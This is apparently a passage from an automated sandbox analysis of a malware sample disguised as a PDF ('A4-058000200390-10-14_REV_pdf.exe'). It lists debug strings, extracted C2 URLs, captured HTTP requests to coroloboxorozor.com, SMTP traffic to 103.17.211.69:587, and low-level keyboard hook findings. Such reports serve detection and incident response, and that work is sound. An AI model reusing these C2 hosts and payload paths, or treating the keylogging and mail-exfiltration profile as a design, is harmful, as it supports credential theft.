                      Source: Binary string: ore.ni.pdb source: WerFault.exe, 0000000B.00000003.685836587.0000000005127000.00000004.00000001.sdmp
                      Source: Binary string: System.pdb source: WerFault.exe, 0000000B.00000002.705274793.0000000005420000.00000004.00000001.sdmp, WerFault.exe, 0000001A.00000002.886941721.00000000053C0000.00000004.00000001.sdmp
                      Source: Binary string: f:\binaries\Intermediate\vb\microsoft.visualbasic.build.vbproj_731629843\objr\x86\Microsoft.VisualBasic.pdb source: NewApp.exe, 00000013.00000002.816014888.00000000009F0000.00000004.00000020.sdmp
                      Source: Binary string: \??\C:\Users\user\AppData\Roaming\NewApp\NewApp.PDBn^ source: NewApp.exe, 00000013.00000002.814816354.0000000000972000.00000004.00000020.sdmp
                      Source: Binary string: System.Windows.Forms.pdb source: WerFault.exe, 0000000B.00000003.685766857.00000000052BB000.00000004.00000001.sdmp, WerFault.exe, 0000001A.00000002.886941721.00000000053C0000.00000004.00000001.sdmp
                      Source: Binary string: Kernel.Appcore.pdb source: WerFault.exe, 0000000B.00000003.685922840.00000000052A0000.00000004.00000040.sdmp
                      Source: Binary string: rtutils.pdbr source: WerFault.exe, 0000000B.00000003.685724502.00000000052B5000.00000004.00000040.sdmp
                      Source: Binary string: psapi.pdb source: WerFault.exe, 0000000B.00000003.685707809.00000000052AA000.00000004.00000040.sdmp
                      Source: Binary string: fwpuclnt.pdb source: WerFault.exe, 0000000B.00000003.685724502.00000000052B5000.00000004.00000040.sdmp
                      Source: Binary string: .pdb8h source: A4-058000200390-10-14_REV_pdf.exe, 00000000.00000002.696989572.0000000000CF7000.00000004.00000010.sdmp
                      Source: Binary string: cryptbase.pdb source: WerFault.exe, 0000000B.00000003.685808970.0000000005111000.00000004.00000001.sdmp
                      Source: Binary string: System.Core.pdbx source: WerFault.exe, 0000000B.00000002.705274793.0000000005420000.00000004.00000001.sdmp, WerFault.exe, 0000001A.00000002.886941721.00000000053C0000.00000004.00000001.sdmp
                      Source: Binary string: cldapi.pdb source: WerFault.exe, 0000000B.00000003.685724502.00000000052B5000.00000004.00000040.sdmp
                      Source: Binary string: \??\C:\Windows\mscorlib.pdbr source: NewApp.exe, 00000013.00000002.814816354.0000000000972000.00000004.00000020.sdmp
                      Source: Binary string: bcryptprimitives.pdb source: WerFault.exe, 0000000B.00000003.685695043.00000000052A2000.00000004.00000040.sdmp
                      Source: Binary string: mscoreei.pdb source: WerFault.exe, 0000000B.00000003.685695043.00000000052A2000.00000004.00000040.sdmp
                      Source: Binary string: onfiguration.pdbrr source: WerFault.exe, 0000000B.00000003.685828894.00000000052BC000.00000004.00000001.sdmp
                      Source: Binary string: combase.pdbk source: WerFault.exe, 0000000B.00000003.685695043.00000000052A2000.00000004.00000040.sdmp
                      Source: Binary string: System.Core.pdb source: WerFault.exe, 0000000B.00000003.685766857.00000000052BB000.00000004.00000001.sdmp, WerFault.exe, 0000001A.00000002.886941721.00000000053C0000.00000004.00000001.sdmp
                      Source: Binary string: C:\Windows\Microsoft.VisualBasic.pdbpdbsic.pdbl.* source: A4-058000200390-10-14_REV_pdf.exe, 00000000.00000002.697469091.000000000112F000.00000004.00000020.sdmp
                      Source: Binary string: oleaut32.pdb source: WerFault.exe, 0000000B.00000003.685707809.00000000052AA000.00000004.00000040.sdmp
                      Source: Binary string: System.Windows.Forms.pdbx source: WerFault.exe, 0000000B.00000002.705274793.0000000005420000.00000004.00000001.sdmp, WerFault.exe, 0000001A.00000002.886941721.00000000053C0000.00000004.00000001.sdmp
                      Source: Binary string: A4-058000200390-10-14_REV_pdf.PDBZ source: A4-058000200390-10-14_REV_pdf.exe, 00000000.00000002.696989572.0000000000CF7000.00000004.00000010.sdmp
                      Source: Binary string: OneCoreUAPCommonProxyStub.pdb source: WerFault.exe, 0000000B.00000003.685724502.00000000052B5000.00000004.00000040.sdmp
                      Source: Binary string: bcryptprimitives.pdbk source: WerFault.exe, 0000000B.00000003.685695043.00000000052A2000.00000004.00000040.sdmp
                      Source: Binary string: wuser32.pdb source: WerFault.exe, 0000000B.00000003.685707809.00000000052AA000.00000004.00000040.sdmp
                      Source: Binary string: System.ni.pdb source: WerFault.exe, 0000000B.00000003.685836587.0000000005127000.00000004.00000001.sdmp, WerFault.exe, 0000001A.00000002.886941721.00000000053C0000.00000004.00000001.sdmp
                      Source: Binary string: edputil.pdb source: WerFault.exe, 0000000B.00000003.685724502.00000000052B5000.00000004.00000040.sdmp
                      Source: Binary string: crypt32.pdb source: WerFault.exe, 0000000B.00000003.685724502.00000000052B5000.00000004.00000040.sdmp

                      Networking:

                      barindex
                      C2 URLs / IPs found in malware configurationShow sources
                      Source: Malware configuration extractorURLs: http://2nUtGMgnxihCA8N2g.org
                      Source: global trafficTCP traffic: 192.168.2.4:49763 -> 103.17.211.69:587
                      Source: global trafficHTTP traffic detected: GET /base/BE0C9BE287721D2E1639C8881BC9F105.html HTTP/1.1Host: coroloboxorozor.comConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /base/B7EFDEC15CD29E4CF1B708AC6486760D.html HTTP/1.1Host: coroloboxorozor.com
                      Source: global trafficHTTP traffic detected: GET /base/BE0C9BE287721D2E1639C8881BC9F105.html HTTP/1.1Host: coroloboxorozor.comConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /base/B7EFDEC15CD29E4CF1B708AC6486760D.html HTTP/1.1Host: coroloboxorozor.com
                      Source: global trafficHTTP traffic detected: GET /base/BE0C9BE287721D2E1639C8881BC9F105.html HTTP/1.1Host: coroloboxorozor.comConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /base/B7EFDEC15CD29E4CF1B708AC6486760D.html HTTP/1.1Host: coroloboxorozor.com
                      Source: Joe Sandbox ViewIP Address: 104.21.71.230 104.21.71.230
                      Source: Joe Sandbox ViewASN Name: IPSERVERONE-AS-APIPServerOneSolutionsSdnBhdMY IPSERVERONE-AS-APIPServerOneSolutionsSdnBhdMY
                      Source: global trafficTCP traffic: 192.168.2.4:49763 -> 103.17.211.69:587
                      Source: global trafficHTTP traffic detected: GET /base/BE0C9BE287721D2E1639C8881BC9F105.html HTTP/1.1Host: coroloboxorozor.comConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /base/B7EFDEC15CD29E4CF1B708AC6486760D.html HTTP/1.1Host: coroloboxorozor.com
                      Source: global trafficHTTP traffic detected: GET /base/BE0C9BE287721D2E1639C8881BC9F105.html HTTP/1.1Host: coroloboxorozor.comConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /base/B7EFDEC15CD29E4CF1B708AC6486760D.html HTTP/1.1Host: coroloboxorozor.com
                      Source: global trafficHTTP traffic detected: GET /base/BE0C9BE287721D2E1639C8881BC9F105.html HTTP/1.1Host: coroloboxorozor.comConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /base/B7EFDEC15CD29E4CF1B708AC6486760D.html HTTP/1.1Host: coroloboxorozor.com
                      Source: unknownDNS traffic detected: queries for: coroloboxorozor.com
                      Source: NewApp.exe, 00000018.00000002.915676599.0000000002898000.00000004.00000001.sdmp, NewApp.exe, 00000018.00000002.916299146.0000000002A55000.00000004.00000001.sdmp, NewApp.exe, 00000018.00000002.916269984.0000000002A4C000.00000004.00000001.sdmp, NewApp.exe, 00000018.00000002.915858947.000000000298E000.00000004.00000001.sdmpString found in binary or memory: http://2nUtGMgnxihCA8N2g.org
                      Source: A4-058000200390-10-14_REV_pdf.exe, 00000008.00000002.920904751.00000000067E0000.00000004.00000001.sdmp, NewApp.exe, 00000018.00000002.916501179.0000000002A9A000.00000004.00000001.sdmpString found in binary or memory: http://apps.identrust.com/roots/dstrootcax3.p7c0
                      Source: A4-058000200390-10-14_REV_pdf.exe, 00000000.00000002.697632475.0000000002C21000.00000004.00000001.sdmp, NewApp.exe, 00000012.00000002.817905457.0000000002F11000.00000004.00000001.sdmp, NewApp.exe, 00000013.00000002.818132626.0000000002601000.00000004.00000001.sdmpString found in binary or memory: http://coroloboxorozor.com
                      Source: A4-058000200390-10-14_REV_pdf.exe, 00000000.00000002.697632475.0000000002C21000.00000004.00000001.sdmp, NewApp.exe, 00000012.00000002.817905457.0000000002F11000.00000004.00000001.sdmp, NewApp.exe, 00000013.00000002.818132626.0000000002601000.00000004.00000001.sdmpString found in binary or memory: http://coroloboxorozor.com/base/B7EFDEC15CD29E4CF1B708AC6486760D.html
                      Source: A4-058000200390-10-14_REV_pdf.exe, 00000000.00000002.697632475.0000000002C21000.00000004.00000001.sdmp, NewApp.exe, 00000012.00000002.817905457.0000000002F11000.00000004.00000001.sdmp, NewApp.exe, 00000013.00000002.818132626.0000000002601000.00000004.00000001.sdmpString found in binary or memory: http://coroloboxorozor.com/base/BE0C9BE287721D2E1639C8881BC9F105.html
                      Source: A4-058000200390-10-14_REV_pdf.exe, 00000008.00000002.920904751.00000000067E0000.00000004.00000001.sdmp, NewApp.exe, 00000018.00000002.916501179.0000000002A9A000.00000004.00000001.sdmpString found in binary or memory: http://cps.letsencrypt.org0
                      Source: A4-058000200390-10-14_REV_pdf.exe, 00000008.00000002.920904751.00000000067E0000.00000004.00000001.sdmp, NewApp.exe, 00000018.00000002.916501179.0000000002A9A000.00000004.00000001.sdmpString found in binary or memory: http://cps.root-x1.letsencrypt.org0
                      Source: A4-058000200390-10-14_REV_pdf.exe, 00000008.00000002.920904751.00000000067E0000.00000004.00000001.sdmp, NewApp.exe, 00000018.00000002.916501179.0000000002A9A000.00000004.00000001.sdmpString found in binary or memory: http://crl.identrust.com/DSTROOTCAX3CRL.crl0
                      Source: A4-058000200390-10-14_REV_pdf.exe, 00000008.00000002.916340708.0000000002FFB000.00000004.00000001.sdmp, NewApp.exe, 00000018.00000002.916097296.0000000002A24000.00000004.00000001.sdmpString found in binary or memory: http://mail.soonlogistics.com
                      Source: A4-058000200390-10-14_REV_pdf.exe, 00000008.00000002.920904751.00000000067E0000.00000004.00000001.sdmp, NewApp.exe, 00000018.00000002.916501179.0000000002A9A000.00000004.00000001.sdmpString found in binary or memory: http://r3.i.lencr.org/0
                      Source: A4-058000200390-10-14_REV_pdf.exe, 00000008.00000002.920904751.00000000067E0000.00000004.00000001.sdmp, NewApp.exe, 00000018.00000002.916501179.0000000002A9A000.00000004.00000001.sdmpString found in binary or memory: http://r3.o.lencr.org0
                      Source: WerFault.exe, 0000000B.00000003.683834284.0000000005460000.00000004.00000001.sdmp, WerFault.exe, 0000001A.00000003.795863832.0000000005400000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/authentication
                      Source: WerFault.exe, 0000000B.00000003.683834284.0000000005460000.00000004.00000001.sdmp, WerFault.exe, 0000001A.00000003.795863832.0000000005400000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/authorizationdecisionzhttp://schemas.xmlsoap.o
                      Source: WerFault.exe, 0000000B.00000003.683834284.0000000005460000.00000004.00000001.sdmp, WerFault.exe, 0000001A.00000003.795863832.0000000005400000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/dateofbirthrhttp://schemas.xmlsoap.org/ws/2005
                      Source: WerFault.exe, 0000000B.00000003.683834284.0000000005460000.00000004.00000001.sdmp, WerFault.exe, 0000001A.00000003.795863832.0000000005400000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/denyonlysid
                      Source: WerFault.exe, 0000000B.00000003.683834284.0000000005460000.00000004.00000001.sdmp, WerFault.exe, 0000001A.00000003.795863832.0000000005400000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/emailaddressxhttp://schemas.xmlsoap.org/ws/200
                      Source: WerFault.exe, 0000000B.00000003.683834284.0000000005460000.00000004.00000001.sdmp, WerFault.exe, 0000001A.00000003.795863832.0000000005400000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/locality
                      Source: WerFault.exe, 0000000B.00000003.683834284.0000000005460000.00000004.00000001.sdmp, WerFault.exe, 0000001A.00000003.795863832.0000000005400000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/mobilephone
                      Source: A4-058000200390-10-14_REV_pdf.exe, 00000000.00000002.697632475.0000000002C21000.00000004.00000001.sdmp, WerFault.exe, 0000000B.00000003.683834284.0000000005460000.00000004.00000001.sdmp, NewApp.exe, 00000012.00000002.817905457.0000000002F11000.00000004.00000001.sdmp, NewApp.exe, 00000013.00000002.818132626.0000000002601000.00000004.00000001.sdmp, WerFault.exe, 0000001A.00000003.795863832.0000000005400000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                      Source: WerFault.exe, 0000000B.00000003.683834284.0000000005460000.00000004.00000001.sdmp, WerFault.exe, 0000001A.00000003.795863832.0000000005400000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nameidentifier
                      Source: WerFault.exe, 0000000B.00000003.683834284.0000000005460000.00000004.00000001.sdmp, WerFault.exe, 0000001A.00000003.795863832.0000000005400000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/otherphone
                      Source: WerFault.exe, 0000000B.00000003.683834284.0000000005460000.00000004.00000001.sdmp, WerFault.exe, 0000001A.00000003.795863832.0000000005400000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/postalcoderhttp://schemas.xmlsoap.org/ws/2005/
                      Source: WerFault.exe, 0000000B.00000003.683834284.0000000005460000.00000004.00000001.sdmp, WerFault.exe, 0000001A.00000003.795863832.0000000005400000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/stateorprovince
                      Source: WerFault.exe, 0000000B.00000003.683834284.0000000005460000.00000004.00000001.sdmp, WerFault.exe, 0000001A.00000003.795863832.0000000005400000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/streetaddresszhttp://schemas.xmlsoap.org/ws/20
                      Source: WerFault.exe, 0000000B.00000003.683834284.0000000005460000.00000004.00000001.sdmp, WerFault.exe, 0000001A.00000003.795863832.0000000005400000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/thumbprintrhttp://schemas.xmlsoap.org/ws/2005/
                      Source: WerFault.exe, 0000000B.00000003.683834284.0000000005460000.00000004.00000001.sdmp, WerFault.exe, 0000001A.00000003.795863832.0000000005400000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/x500distinguishednamejhttp://schemas.xmlsoap.o

                      Key, Mouse, Clipboard, Microphone and Screen Capturing:

                      barindex
                      Contains functionality to register a low level keyboard hookShow sources
                      Source: C:\Users\user\AppData\Roaming\NewApp\NewApp.exeCode function: 24_2_0643C37C SetWindowsHookExW 0000000D,00000000,?,?24_2_0643C37C
                      Installs a global keyboard hookShow sources
                      Source: C:\Users\user\Desktop\A4-058000200390-10-14_REV_pdf.exeWindows user hook set: 0 keyboard low level C:\Users\user\Desktop\A4-058000200390-10-14_REV_pdf.exeJump to behavior
                      Source: C:\Users\user\AppData\Roaming\NewApp\NewApp.exeWindows user hook set: 0 keyboard low level C:\Users\user\AppData\Roaming\NewApp\NewApp.exe
                      Source: A4-058000200390-10-14_REV_pdf.exe, 00000000.00000002.697398308.00000000010AB000.00000004.00000020.sdmpBinary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>
                      Source: C:\Users\user\Desktop\A4-058000200390-10-14_REV_pdf.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                      Source: C:\Users\user\AppData\Roaming\NewApp\NewApp.exeWindow created: window name: CLIPBRDWNDCLASS

                      System Summary:

                      barindex
                      Initial sample is a PE file and has a suspicious nameShow sources
                      Source: initial sampleStatic PE information: Filename: A4-058000200390-10-14_REV_pdf.exe
                      Source: C:\Users\user\Desktop\A4-058000200390-10-14_REV_pdf.exeCode function: 0_2_00E992E0 NtSetInformationThread,0_2_00E992E0
                      Source: C:\Users\user\Desktop\A4-058000200390-10-14_REV_pdf.exeCode function: 0_2_00E9A031 NtSetInformationThread,0_2_00E9A031
                      Source: C:\Users\user\AppData\Roaming\NewApp\NewApp.exeCode function: 18_2_02DD92E0 NtSetInformationThread,18_2_02DD92E0
                      Source: C:\Users\user\AppData\Roaming\NewApp\NewApp.exeCode function: 19_2_024192E0 NtSetInformationThread,19_2_024192E0
                      Source: C:\Users\user\AppData\Roaming\NewApp\NewApp.exeCode function: 19_2_0241A031 NtSetInformationThread,19_2_0241A031
                      Source: C:\Users\user\Desktop\A4-058000200390-10-14_REV_pdf.exeCode function: 0_2_00E905A80_2_00E905A8
                      Source: C:\Users\user\Desktop\A4-058000200390-10-14_REV_pdf.exeCode function: 0_2_00E9C7610_2_00E9C761
                      Source: C:\Users\user\Desktop\A4-058000200390-10-14_REV_pdf.exeCode function: 0_2_00E918F80_2_00E918F8
                      Source: C:\Users\user\Desktop\A4-058000200390-10-14_REV_pdf.exeCode function: 0_2_00E95B100_2_00E95B10
                      Source: C:\Users\user\Desktop\A4-058000200390-10-14_REV_pdf.exeCode function: 0_2_00E90C600_2_00E90C60
                      Source: C:\Users\user\Desktop\A4-058000200390-10-14_REV_pdf.exeCode function: 0_2_00E9BFE70_2_00E9BFE7
                      Source: C:\Users\user\Desktop\A4-058000200390-10-14_REV_pdf.exeCode function: 0_2_00E905980_2_00E90598
                      Source: C:\Users\user\Desktop\A4-058000200390-10-14_REV_pdf.exeCode function: 0_2_00E955200_2_00E95520
                      Source: C:\Users\user\Desktop\A4-058000200390-10-14_REV_pdf.exeCode function: 0_2_00E90C500_2_00E90C50
                      Source: C:\Users\user\Desktop\A4-058000200390-10-14_REV_pdf.exeCode function: 8_2_02D482108_2_02D48210
                      Source: C:\Users\user\Desktop\A4-058000200390-10-14_REV_pdf.exeCode function: 8_2_02D403208_2_02D40320
                      Source: C:\Users\user\Desktop\A4-058000200390-10-14_REV_pdf.exeCode function: 8_2_02D400408_2_02D40040
                      Source: C:\Users\user\Desktop\A4-058000200390-10-14_REV_pdf.exeCode function: 8_2_02D427438_2_02D42743
                      Source: C:\Users\user\Desktop\A4-058000200390-10-14_REV_pdf.exeCode function: 8_2_02D41F9C8_2_02D41F9C
                      Source: C:\Users\user\Desktop\A4-058000200390-10-14_REV_pdf.exeCode function: 8_2_02D482008_2_02D48200
                      Source: C:\Users\user\Desktop\A4-058000200390-10-14_REV_pdf.exeCode function: 8_2_02D473898_2_02D47389
                      Source: C:\Users\user\Desktop\A4-058000200390-10-14_REV_pdf.exeCode function: 8_2_02D430A08_2_02D430A0
                      Source: C:\Users\user\Desktop\A4-058000200390-10-14_REV_pdf.exeCode function: 8_2_02D4003B8_2_02D4003B
                      Source: C:\Users\user\Desktop\A4-058000200390-10-14_REV_pdf.exeCode function: 8_2_02D477CD8_2_02D477CD
                      Source: C:\Users\user\Desktop\A4-058000200390-10-14_REV_pdf.exeCode function: 8_2_02D477598_2_02D47759
                      Source: C:\Users\user\Desktop\A4-058000200390-10-14_REV_pdf.exeCode function: 8_2_02D41F908_2_02D41F90
                      Source: C:\Users\user\Desktop\A4-058000200390-10-14_REV_pdf.exeCode function: 8_2_02D42FAF8_2_02D42FAF
                      Source: C:\Users\user\Desktop\A4-058000200390-10-14_REV_pdf.exeCode function: 8_2_02D41F3F8_2_02D41F3F
                      Source: C:\Users\user\Desktop\A4-058000200390-10-14_REV_pdf.exeCode function: 8_2_02D43D908_2_02D43D90
                      Source: C:\Users\user\Desktop\A4-058000200390-10-14_REV_pdf.exeCode function: 8_2_063A82688_2_063A8268
                      Source: C:\Users\user\Desktop\A4-058000200390-10-14_REV_pdf.exeCode function: 8_2_063ADAE08_2_063ADAE0
                      Source: C:\Users\user\Desktop\A4-058000200390-10-14_REV_pdf.exeCode function: 8_2_063A00988_2_063A0098
                      Source: C:\Users\user\Desktop\A4-058000200390-10-14_REV_pdf.exeCode function: 8_2_063AF4E88_2_063AF4E8
                      Source: C:\Users\user\Desktop\A4-058000200390-10-14_REV_pdf.exeCode function: 8_2_063A9EB88_2_063A9EB8
                      Source: C:\Users\user\Desktop\A4-058000200390-10-14_REV_pdf.exeCode function: 8_2_063ADAA88_2_063ADAA8
                      Source: C:\Users\user\Desktop\A4-058000200390-10-14_REV_pdf.exeCode function: 8_2_063AC6818_2_063AC681
                      Source: C:\Users\user\Desktop\A4-058000200390-10-14_REV_pdf.exeCode function: 8_2_063ADAD08_2_063ADAD0
                      Source: C:\Users\user\Desktop\A4-058000200390-10-14_REV_pdf.exeCode function: 8_2_063ADB678_2_063ADB67
                      Source: C:\Users\user\Desktop\A4-058000200390-10-14_REV_pdf.exeCode function: 8_2_063AA7FE8_2_063AA7FE
                      Source: C:\Users\user\Desktop\A4-058000200390-10-14_REV_pdf.exeCode function: 8_2_063AC8CD8_2_063AC8CD
                      Source: C:\Users\user\Desktop\A4-058000200390-10-14_REV_pdf.exeCode function: 8_2_063ACCC28_2_063ACCC2
                      Source: C:\Users\user\Desktop\A4-058000200390-10-14_REV_pdf.exeCode function: 8_2_063ACCC48_2_063ACCC4
                      Source: C:\Users\user\Desktop\A4-058000200390-10-14_REV_pdf.exeCode function: 8_2_063ACD1A8_2_063ACD1A
                      Source: C:\Users\user\Desktop\A4-058000200390-10-14_REV_pdf.exeCode function: 8_2_063AA5588_2_063AA558
                      Source: C:\Users\user\Desktop\A4-058000200390-10-14_REV_pdf.exeCode function: 8_2_063AC5A88_2_063AC5A8
                      Source: C:\Users\user\Desktop\A4-058000200390-10-14_REV_pdf.exeCode function: 8_2_063AC5A78_2_063AC5A7
                      Source: C:\Users\user\Desktop\A4-058000200390-10-14_REV_pdf.exeCode function: 8_2_067B97388_2_067B9738
                      Source: C:\Users\user\Desktop\A4-058000200390-10-14_REV_pdf.exeCode function: 8_2_067B84608_2_067B8460
                      Source: C:\Users\user\Desktop\A4-058000200390-10-14_REV_pdf.exeCode function: 8_2_067B00408_2_067B0040
                      Source: C:\Users\user\Desktop\A4-058000200390-10-14_REV_pdf.exeCode function: 8_2_067B90D08_2_067B90D0
                      Source: C:\Users\user\Desktop\A4-058000200390-10-14_REV_pdf.exeCode function: 8_2_067B55388_2_067B5538
                      Source: C:\Users\user\Desktop\A4-058000200390-10-14_REV_pdf.exeCode function: 8_2_067B4D008_2_067B4D00
                      Source: C:\Users\user\Desktop\A4-058000200390-10-14_REV_pdf.exeCode function: 8_2_067B9AE78_2_067B9AE7
                      Source: C:\Users\user\AppData\Roaming\NewApp\NewApp.exeCode function: 18_2_02DDC61818_2_02DDC618
                      Source: C:\Users\user\AppData\Roaming\NewApp\NewApp.exeCode function: 18_2_02DD05A818_2_02DD05A8
                      Source: C:\Users\user\AppData\Roaming\NewApp\NewApp.exeCode function: 18_2_02DD5B1018_2_02DD5B10
                      Source: C:\Users\user\AppData\Roaming\NewApp\NewApp.exeCode function: 18_2_02DD18F818_2_02DD18F8
                      Source: C:\Users\user\AppData\Roaming\NewApp\NewApp.exeCode function: 18_2_02DD295018_2_02DD2950
                      Source: C:\Users\user\AppData\Roaming\NewApp\NewApp.exeCode function: 18_2_02DDBFF018_2_02DDBFF0
                      Source: C:\Users\user\AppData\Roaming\NewApp\NewApp.exeCode function: 18_2_02DD0C6018_2_02DD0C60
                      Source: C:\Users\user\AppData\Roaming\NewApp\NewApp.exeCode function: 18_2_02DD059818_2_02DD0598
                      Source: C:\Users\user\AppData\Roaming\NewApp\NewApp.exeCode function: 18_2_02DD0C5018_2_02DD0C50
                      Source: C:\Users\user\AppData\Roaming\NewApp\NewApp.exeCode function: 19_2_0241059819_2_02410598
                      Source: C:\Users\user\AppData\Roaming\NewApp\NewApp.exeCode function: 19_2_02415B1019_2_02415B10
                      Source: C:\Users\user\AppData\Roaming\NewApp\NewApp.exeCode function: 19_2_024118F819_2_024118F8
                      Source: C:\Users\user\AppData\Roaming\NewApp\NewApp.exeCode function: 19_2_0241294019_2_02412940
                      Source: C:\Users\user\AppData\Roaming\NewApp\NewApp.exeCode function: 19_2_0241BFF019_2_0241BFF0
                      Source: C:\Users\user\AppData\Roaming\NewApp\NewApp.exeCode function: 19_2_02410C5019_2_02410C50
                      Source: C:\Users\user\AppData\Roaming\NewApp\NewApp.exeCode function: 19_2_0241CD4119_2_0241CD41
                      Source: C:\Users\user\AppData\Roaming\NewApp\NewApp.exeCode function: 19_2_0241552019_2_02415520
                      Source: C:\Users\user\AppData\Roaming\NewApp\NewApp.exeCode function: 24_2_04D2274224_2_04D22742
                      Source: C:\Users\user\AppData\Roaming\NewApp\NewApp.exeCode function: 24_2_04D2004024_2_04D20040
                      Source: C:\Users\user\AppData\Roaming\NewApp\NewApp.exeCode function: 24_2_04D2821024_2_04D28210
                      Source: C:\Users\user\AppData\Roaming\NewApp\NewApp.exeCode function: 24_2_04D2032024_2_04D20320
                      Source: C:\Users\user\AppData\Roaming\NewApp\NewApp.exeCode function: 24_2_04D2739824_2_04D27398
                      Source: C:\Users\user\AppData\Roaming\NewApp\NewApp.exeCode function: 24_2_04D21F9C24_2_04D21F9C
                      Source: C:\Users\user\AppData\Roaming\NewApp\NewApp.exeCode function: 24_2_04D2000724_2_04D20007
                      Source: C:\Users\user\AppData\Roaming\NewApp\NewApp.exeCode function: 24_2_04D2820024_2_04D28200
                      Source: C:\Users\user\AppData\Roaming\NewApp\NewApp.exeCode function: 24_2_04D2031124_2_04D20311
                      Source: C:\Users\user\AppData\Roaming\NewApp\NewApp.exeCode function: 24_2_04D277CD24_2_04D277CD
                      Source: C:\Users\user\AppData\Roaming\NewApp\NewApp.exeCode function: 24_2_04D2775924_2_04D27759
                      Source: C:\Users\user\AppData\Roaming\NewApp\NewApp.exeCode function: 24_2_04D2309E24_2_04D2309E
                      Source: C:\Users\user\AppData\Roaming\NewApp\NewApp.exeCode function: 24_2_04D230A024_2_04D230A0
                      Source: C:\Users\user\AppData\Roaming\NewApp\NewApp.exeCode function: 24_2_04D2738924_2_04D27389
                      Source: C:\Users\user\AppData\Roaming\NewApp\NewApp.exeCode function: 24_2_04D23D9024_2_04D23D90
                      Source: C:\Users\user\AppData\Roaming\NewApp\NewApp.exeCode function: 24_2_04D21F9024_2_04D21F90
                      Source: C:\Users\user\AppData\Roaming\NewApp\NewApp.exeCode function: 24_2_05D3A55824_2_05D3A558
                      Source: C:\Users\user\AppData\Roaming\NewApp\NewApp.exeCode function: 24_2_05D3F4E824_2_05D3F4E8
                      Source: C:\Users\user\AppData\Roaming\NewApp\NewApp.exeCode function: 24_2_05D3009824_2_05D30098
                      Source: C:\Users\user\AppData\Roaming\NewApp\NewApp.exeCode function: 24_2_05D3DAE024_2_05D3DAE0
                      Source: C:\Users\user\AppData\Roaming\NewApp\NewApp.exeCode function: 24_2_05D3C5A124_2_05D3C5A1
                      Source: C:\Users\user\AppData\Roaming\NewApp\NewApp.exeCode function: 24_2_05D3C5A824_2_05D3C5A8
                      Source: C:\Users\user\AppData\Roaming\NewApp\NewApp.exeCode function: 24_2_05D3A54824_2_05D3A548
                      Source: C:\Users\user\AppData\Roaming\NewApp\NewApp.exeCode function: 24_2_05D3CD1A24_2_05D3CD1A
                      Source: C:\Users\user\AppData\Roaming\NewApp\NewApp.exeCode function: 24_2_05D3F4D824_2_05D3F4D8
                      Source: C:\Users\user\AppData\Roaming\NewApp\NewApp.exeCode function: 24_2_05D3CCC224_2_05D3CCC2
                      Source: C:\Users\user\AppData\Roaming\NewApp\NewApp.exeCode function: 24_2_05D3CCC424_2_05D3CCC4
                      Source: C:\Users\user\AppData\Roaming\NewApp\NewApp.exeCode function: 24_2_05D3748824_2_05D37488
                      Source: C:\Users\user\AppData\Roaming\NewApp\NewApp.exeCode function: 24_2_05D3A7FE24_2_05D3A7FE
                      Source: C:\Users\user\AppData\Roaming\NewApp\NewApp.exeCode function: 24_2_05D3C68124_2_05D3C681
                      Source: C:\Users\user\AppData\Roaming\NewApp\NewApp.exeCode function: 24_2_05D39EB824_2_05D39EB8
                      Source: C:\Users\user\AppData\Roaming\NewApp\NewApp.exeCode function: 24_2_05D3C8CD24_2_05D3C8CD
                      Source: C:\Users\user\AppData\Roaming\NewApp\NewApp.exeCode function: 24_2_05D3DB6724_2_05D3DB67
                      Source: C:\Users\user\AppData\Roaming\NewApp\NewApp.exeCode function: 24_2_05D3DAD524_2_05D3DAD5
                      Source: C:\Users\user\AppData\Roaming\NewApp\NewApp.exeCode function: 24_2_063897AB24_2_063897AB
                      Source: C:\Users\user\AppData\Roaming\NewApp\NewApp.exeCode function: 24_2_0638846024_2_06388460
                      Source: C:\Users\user\AppData\Roaming\NewApp\NewApp.exeCode function: 24_2_0638004024_2_06380040
                      Source: C:\Users\user\AppData\Roaming\NewApp\NewApp.exeCode function: 24_2_063890D024_2_063890D0
                      Source: C:\Users\user\AppData\Roaming\NewApp\NewApp.exeCode function: 24_2_0638553824_2_06385538
                      Source: C:\Users\user\AppData\Roaming\NewApp\NewApp.exeCode function: 24_2_06384D0024_2_06384D00
                      Source: C:\Users\user\AppData\Roaming\NewApp\NewApp.exeCode function: 24_2_06389AE724_2_06389AE7
                      Source: C:\Users\user\AppData\Roaming\NewApp\NewApp.exeCode function: 24_2_0638772724_2_06387727
                      Source: C:\Users\user\AppData\Roaming\NewApp\NewApp.exeCode function: 24_2_0638442424_2_06384424
                      Source: C:\Users\user\AppData\Roaming\NewApp\NewApp.exeCode function: 24_2_0638001F24_2_0638001F
